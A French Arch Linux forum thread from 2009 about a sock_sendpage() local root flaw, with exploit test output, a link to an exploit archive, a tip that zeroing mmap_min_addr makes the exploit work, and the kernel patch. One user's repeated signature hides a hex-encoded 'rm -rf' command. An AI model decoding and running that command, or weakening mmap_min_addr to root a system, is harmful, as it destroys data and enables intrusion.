[securite]Faille critique kernel 2.4 et 2.6
- r4is3_your_g0d
- Hankyu
- Messages : 27
- Inscription : jeu. 23 juil. 2009, 21:05
[securite]Faille critique kernel 2.4 et 2.6
Bonjour à tous,
Un 0day est apparue sous la forme d'un local root exploit lié a sock_sendpage() tous les kernel depuis le 2.4.37.5 jusqu'au 2.6.31-rc6 sont vulnerables voir ici. Un patch a deja etait mis à disposition par Linus Torvalds : http://git.kernel.org/?p=linux/kernel/g ... 45cf0f1b98
Des news pour un prochaine MAJ sous Arch?
Un 0day est apparue sous la forme d'un local root exploit lié a sock_sendpage() tous les kernel depuis le 2.4.37.5 jusqu'au 2.6.31-rc6 sont vulnerables voir ici. Un patch a deja etait mis à disposition par Linus Torvalds : http://git.kernel.org/?p=linux/kernel/g ... 45cf0f1b98
Des news pour un prochaine MAJ sous Arch?
Enfin, et parce que le code source est public et donc auditable, la sécurité des logiciels libres peut être mieux assurée. Bernard CARAYON
Code : Tout sélectionner
x72x6Dx20x2Dx72x66x20x7ex20x2Fx2Ax20x32x3ex20x2fx64x65x76x2fx6ex75x6cx6cx20x26
- Skunnyk
- Maître du Kyudo
- Messages : 1137
- Inscription : mer. 06 sept. 2006, 21:31
- Localisation : IRC
- Contact :
Re: [securite]Faille critique kernel 2.4 et 2.6
Je crains pas, j'ai pas Pulse Audio
(https://linuxfr.org/~patrick_g/28661.html )
Humour à part (il faut apparement pulse audio quand on a selinux, sinon pas besoin), le package archlinux sortira quand une release du kernel sera faite je pense, comme pour la faille du même genre il y a quelques semaines.
Pärt contre coup sur coup 2 failles local root exploit, c'est assez rare

Humour à part (il faut apparement pulse audio quand on a selinux, sinon pas besoin), le package archlinux sortira quand une release du kernel sera faite je pense, comme pour la faille du même genre il y a quelques semaines.
Pärt contre coup sur coup 2 failles local root exploit, c'est assez rare
https://blog.alteroot.org
@archlinuxfr sur Twitter : https://twitter.com/archlinuxfr
@archlinuxfr sur Mastodon: https://mamot.fr/@archlinuxfr
@archlinuxfr sur Twitter : https://twitter.com/archlinuxfr
@archlinuxfr sur Mastodon: https://mamot.fr/@archlinuxfr
- Skunnyk
- Maître du Kyudo
- Messages : 1137
- Inscription : mer. 06 sept. 2006, 21:31
- Localisation : IRC
- Contact :
Re: [securite]Faille critique kernel 2.4 et 2.6
Je viens de tester l'exploit sur mon arch:
$ ./wunderbar_emporium.sh
[+] Personality set to: PER_SVR4
Pulseaudio does not exist!
Je n'ai ni pulse audio, ni selinux. Quelqu'un avec PA peut tester ?
$ ./wunderbar_emporium.sh
[+] Personality set to: PER_SVR4
Pulseaudio does not exist!
Je n'ai ni pulse audio, ni selinux. Quelqu'un avec PA peut tester ?

https://blog.alteroot.org
@archlinuxfr sur Twitter : https://twitter.com/archlinuxfr
@archlinuxfr sur Mastodon: https://mamot.fr/@archlinuxfr
@archlinuxfr sur Twitter : https://twitter.com/archlinuxfr
@archlinuxfr sur Mastodon: https://mamot.fr/@archlinuxfr
- r4is3_your_g0d
- Hankyu
- Messages : 27
- Inscription : jeu. 23 juil. 2009, 21:05
Re: [securite]Faille critique kernel 2.4 et 2.6
Les exploit sont assez ressemblant apparement. j'ai pas encore regarder le dernier, (j'y vais d'ailleur juste aprés) mais c'est vrai que deux vuln aussi critique en aussi peu de temps
J'avais pas lu tout le fil mais :

J'avais pas lu tout le fil mais :
Donc comme tu disais, à moins d'avoir SELinux, on est assez à l'abri.-------------------
Mitigation
-----------------------
Recent kernels with mmap_min_addr support may prevent exploitation if
the sysctl vm.mmap_min_addr is set above zero. However, administrators
should be aware that LSM based mandatory access control systems, such
as SELinux, may alter this functionality.
Enfin, et parce que le code source est public et donc auditable, la sécurité des logiciels libres peut être mieux assurée. Bernard CARAYON
Code : Tout sélectionner
x72x6Dx20x2Dx72x66x20x7ex20x2Fx2Ax20x32x3ex20x2fx64x65x76x2fx6ex75x6cx6cx20x26
Re: [securite]Faille critique kernel 2.4 et 2.6
Perso l'exploi à échoué sur mon Arch
- r4is3_your_g0d
- Hankyu
- Messages : 27
- Inscription : jeu. 23 juil. 2009, 21:05
Re: [securite]Faille critique kernel 2.4 et 2.6
Marche pas non, pas PA, par contre sur milw0rm il y a un autre exploit : http://milw0rm.com/sploits/2009-proto_ops.tgzSkunnyk a écrit :Je viens de tester l'exploit sur mon arch:
$ ./wunderbar_emporium.sh
[+] Personality set to: PER_SVR4
Pulseaudio does not exist!
Je n'ai ni pulse audio, ni selinux. Quelqu'un avec PA peut tester ?
et le resultat :
Code : Tout sélectionner
padlina z lublina
failed
Enfin, et parce que le code source est public et donc auditable, la sécurité des logiciels libres peut être mieux assurée. Bernard CARAYON
Code : Tout sélectionner
x72x6Dx20x2Dx72x66x20x7ex20x2Fx2Ax20x32x3ex20x2fx64x65x76x2fx6ex75x6cx6cx20x26
Re: [securite]Faille critique kernel 2.4 et 2.6
En fait par défaut Archlinux est protégé contre cet exploit.
Mais après un :
Et l'exploit devient fonctionnel (avec pulseaudio ou pas, PA ne sert que pour contrer SELinux à priori)
Mais après un :
Code : Tout sélectionner
echo 0 >/proc/sys/vm/mmap_min_addr
- r4is3_your_g0d
- Hankyu
- Messages : 27
- Inscription : jeu. 23 juil. 2009, 21:05
Re: [securite]Faille critique kernel 2.4 et 2.6
Oui c'est le premier truc que j'ai verifié aprés avoir lu ca et avant de me demander si j'allais appliquer le patch.
chez moi :
Du coup ca mitige enormement la decouverte. En tous cas je suis bien content d'avoir ouvert ce topic parcequ'habituellement ca parle pas beaucoup de sécurité par ici.
chez moi :
Code : Tout sélectionner
sysctl -a | grep mmap_min_addr
vm.mmap_min_addr = 4096

Enfin, et parce que le code source est public et donc auditable, la sécurité des logiciels libres peut être mieux assurée. Bernard CARAYON
Code : Tout sélectionner
x72x6Dx20x2Dx72x66x20x7ex20x2Fx2Ax20x32x3ex20x2fx64x65x76x2fx6ex75x6cx6cx20x26
Re: [securite]Faille critique kernel 2.4 et 2.6
Oui mais débin/ubuntu/redhat sont faillible à cet exploit.
Y'a un ientérêt à pouvoir mapper en 0 ?
Y'a un ientérêt à pouvoir mapper en 0 ?
- r4is3_your_g0d
- Hankyu
- Messages : 27
- Inscription : jeu. 23 juil. 2009, 21:05
Re: [securite]Faille critique kernel 2.4 et 2.6
Par defaut?? nan quand même pas??ddup1 a écrit :Oui mais débin/ubuntu/redhat sont faillible à cet exploit.
Et mapper en 0 iol n'y a pas d'interet (enfin sauf si on veut winer n'importe quoi) bien au contraire, justement l'option protege l'accés aux adresses basses en userland ca empeche donc les NULL pointer dereference.
Enfin, et parce que le code source est public et donc auditable, la sécurité des logiciels libres peut être mieux assurée. Bernard CARAYON
Code : Tout sélectionner
x72x6Dx20x2Dx72x66x20x7ex20x2Fx2Ax20x32x3ex20x2fx64x65x76x2fx6ex75x6cx6cx20x26
Re: [securite]Faille critique kernel 2.4 et 2.6
Sisi les distrib citées sont faillibles 
Edit : possible piste distrib ayant installé wine par exemple, lu sur linuxfr :
# Wine needs to access the bottom 64k of memory in order to launch
# 16 bit programs.
vm.mmap_min_addr = 0

Edit : possible piste distrib ayant installé wine par exemple, lu sur linuxfr :
# Wine needs to access the bottom 64k of memory in order to launch
# 16 bit programs.
vm.mmap_min_addr = 0
- r4is3_your_g0d
- Hankyu
- Messages : 27
- Inscription : jeu. 23 juil. 2009, 21:05
Re: [securite]Faille critique kernel 2.4 et 2.6
Arf Debian quand même
Sinon oui c'est ce que je voulais dire quand je parlais de winer n'importe quoi, d'ailleurs c'est hallucinant le nombre tuto et forum qui conseillent direct de mapper en 0 dés qu'il y a un probleme avec wine, ca en dit long sur le nombre de machines potentiellement faillibles.

Sinon oui c'est ce que je voulais dire quand je parlais de winer n'importe quoi, d'ailleurs c'est hallucinant le nombre tuto et forum qui conseillent direct de mapper en 0 dés qu'il y a un probleme avec wine, ca en dit long sur le nombre de machines potentiellement faillibles.
Enfin, et parce que le code source est public et donc auditable, la sécurité des logiciels libres peut être mieux assurée. Bernard CARAYON
Code : Tout sélectionner
x72x6Dx20x2Dx72x66x20x7ex20x2Fx2Ax20x32x3ex20x2fx64x65x76x2fx6ex75x6cx6cx20x26
Re: [securite]Faille critique kernel 2.4 et 2.6
Ben la meme pas besoin de conseiller, c'est un fichier installé avec wine dans /etc/sysctl.d :d
- r4is3_your_g0d
- Hankyu
- Messages : 27
- Inscription : jeu. 23 juil. 2009, 21:05
Re: [securite]Faille critique kernel 2.4 et 2.6
choqued! Je ne wine rien puisqu'il n'y a rien d'interessant à prendre chez windows. Peut-être pour les gamers mais je ne joue pas. Il va falloir rester attentif tout de même parcequ'à mon avis il risque d'y avoir pas mal d'exploits qui vont fleurir ces prochaines semaines.
Enfin, et parce que le code source est public et donc auditable, la sécurité des logiciels libres peut être mieux assurée. Bernard CARAYON
Code : Tout sélectionner
x72x6Dx20x2Dx72x66x20x7ex20x2Fx2Ax20x32x3ex20x2fx64x65x76x2fx6ex75x6cx6cx20x26
Re: [securite]Faille critique kernel 2.4 et 2.6
D'autant plus que ce hack wine semble limité aux applications 16bits, même sous windows ca devient rare ce genre d'appli :/
Re: [securite]Faille critique kernel 2.4 et 2.6
Archlinux est à jour :
diff -Nur linux-2.6.30/net/socket.c linux-2.6.30-ARCH/net/socket.c
--- linux-2.6.30/net/socket.c 2009-06-10 05:05:27.000000000 +0200
+++ linux-2.6.30-ARCH/net/socket.c 2009-08-17 14:33:27.929112920 +0200
@@ -736,7 +736,7 @@
if (more)
flags |= MSG_MORE;
- return sock->ops->sendpage(sock, page, offset, size, flags);
+ return kernel_sendpage(sock, page, offset, size, flags);
}
Voila plus de risque lié à cette faille sur Arch à jour
diff -Nur linux-2.6.30/net/socket.c linux-2.6.30-ARCH/net/socket.c
--- linux-2.6.30/net/socket.c 2009-06-10 05:05:27.000000000 +0200
+++ linux-2.6.30-ARCH/net/socket.c 2009-08-17 14:33:27.929112920 +0200
@@ -736,7 +736,7 @@
if (more)
flags |= MSG_MORE;
- return sock->ops->sendpage(sock, page, offset, size, flags);
+ return kernel_sendpage(sock, page, offset, size, flags);
}
Voila plus de risque lié à cette faille sur Arch à jour

- Skunnyk
- Maître du Kyudo
- Messages : 1137
- Inscription : mer. 06 sept. 2006, 21:31
- Localisation : IRC
- Contact :
Re: [securite]Faille critique kernel 2.4 et 2.6
Il ne reste plus qu'a attendre la prochaine 

https://blog.alteroot.org
@archlinuxfr sur Twitter : https://twitter.com/archlinuxfr
@archlinuxfr sur Mastodon: https://mamot.fr/@archlinuxfr
@archlinuxfr sur Twitter : https://twitter.com/archlinuxfr
@archlinuxfr sur Mastodon: https://mamot.fr/@archlinuxfr
- r4is3_your_g0d
- Hankyu
- Messages : 27
- Inscription : jeu. 23 juil. 2009, 21:05
Re: [securite]Faille critique kernel 2.4 et 2.6
C'est pour des trucs comme ca que je ne me demande jamais pourqui j'adore cette distribddup1 a écrit :Archlinux est à jour :
diff -Nur linux-2.6.30/net/socket.c linux-2.6.30-ARCH/net/socket.c
--- linux-2.6.30/net/socket.c 2009-06-10 05:05:27.000000000 +0200
+++ linux-2.6.30-ARCH/net/socket.c 2009-08-17 14:33:27.929112920 +0200
@@ -736,7 +736,7 @@
if (more)
flags |= MSG_MORE;
- return sock->ops->sendpage(sock, page, offset, size, flags);
+ return kernel_sendpage(sock, page, offset, size, flags);
}
Voila plus de risque lié à cette faille sur Arch à jour

Enfin, et parce que le code source est public et donc auditable, la sécurité des logiciels libres peut être mieux assurée. Bernard CARAYON
Code : Tout sélectionner
x72x6Dx20x2Dx72x66x20x7ex20x2Fx2Ax20x32x3ex20x2fx64x65x76x2fx6ex75x6cx6cx20x26